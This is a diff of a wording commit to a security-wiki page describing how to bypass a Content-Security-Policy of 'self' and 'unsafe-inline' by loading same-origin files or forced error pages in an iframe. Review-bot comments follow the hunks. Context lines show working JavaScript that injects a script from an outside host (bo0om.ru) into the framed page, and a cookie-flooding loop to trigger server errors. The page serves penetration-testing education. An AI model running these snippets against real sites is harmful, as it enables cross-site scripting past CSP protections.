Update csp-bypass-self-+-unsafe-inline-with-iframes.md
parent
0083ed7909
commit
450d0b4463
|
@ -25,15 +25,15 @@ Content-Security-Policy: default-src ‘self’ ‘unsafe-inline’;
|
|||
|
||||
Prohibits usage of any functions that execute code transmitted as a string. For example: `eval, setTimeout, setInterval` will all be blocked because of the setting `unsafe-eval`
|
||||
|
||||
Any content from external sources is also blocked, including images, css, websockets, and, especially, JS
|
||||
Any content from external sources is also blocked, including images, CSS, WebSockets, and, especially, JS
|
||||
|
||||
## Via text & images
|
||||
|
||||
Modern browsers transform images and texts o HTML files to visualize them better (set background, center...).
|
||||
Modern browsers transform images and texts into HTML files to visualize them better (set background, center, etc).
|
||||
|
||||
Therefore, if you **open an image or txt file** such as **favicon.ico** or **robots.txt** with an **`iframe`**, you will open it as HTML.
|
||||
|
||||
**These kind of pages usually doesn't have CSP headers and might not have X-Frame-Options**, so you can execute arbitrary JS from them:
|
||||
**These kinds of pages usually don't have CSP headers and might not have X-Frame-Options**, so you can execute arbitrary JS from them:
|
||||
|
||||
```javascript
|
||||
frame=document.createElement("iframe");
|
||||
|
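Review bot: The unchanged context sentence at the top of this hunk says `eval`, `setTimeout` and `setInterval` are blocked "because of the setting `unsafe-eval`", but the policy shown in the hunk header (`default-src 'self' 'unsafe-inline'`) does not set `unsafe-eval`; the blocking follows from its absence. Since this commit is already a wording pass over these paragraphs, reword it to something like "will all be blocked because `unsafe-eval` is not set". Two smaller points: the policy in the header uses typographic quotes (‘self’) where CSP keywords need ASCII single quotes, and the new "center, etc)" should read "center, etc.)".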
@ -46,7 +46,7 @@ window.frames[0].document.head.appendChild(script);
|
|||
|
||||
## Via Errors
|
||||
|
||||
Same as text files or images, **error responses usually doesn't have CSP headers and might not have X-Frame-Options**. So, you can force errors and load them inside an iframe:
|
||||
Same as text files or images, **error responses usually don't have CSP headers and might not have X-Frame-Options**. So, you can force errors and load them inside an iframe:
|
||||
|
||||
```javascript
|
||||
// Force nginx error
|
||||
|
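Review bot: The corrected sentence under "Via Errors" still opens with "Same as text files or images", which reads as a fragment; "As with text files or images," would match the grammar fix made in the rest of the line. The section also states that error responses usually lack CSP and X-Frame-Options without saying what the remedy is; a closing sentence noting that these headers need to be sent on error responses as well as on normal pages would make the page useful to the people who have to fix it.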
@ -69,7 +69,7 @@ for(var i=0;i<5;i++){document.cookie=i+"="}
|
|||
```
|
||||
|
||||
```javascript
|
||||
// After any of the previous examples, you can execute JS in the iframe wih something like:
|
||||
// After any of the previous examples, you can execute JS in the iframe with something like:
|
||||
script=document.createElement('script');
|
||||
script.src='//bo0om.ru/csp.js';
|
||||
window.frames[0].document.head.appendChild(script);
|
||||
|
|
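Review bot: The context lines right after the corrected comment load `//bo0om.ru/csp.js`, a hard-coded third-party host, so anyone pasting the snippet pulls script from a server they do not control. While this block is being touched, replace it with a placeholder host the reader is expected to substitute. `script` is also assigned without `var`/`let`/`const`, which creates an implicit global and throws in strict mode; declaring it is a one-word fix.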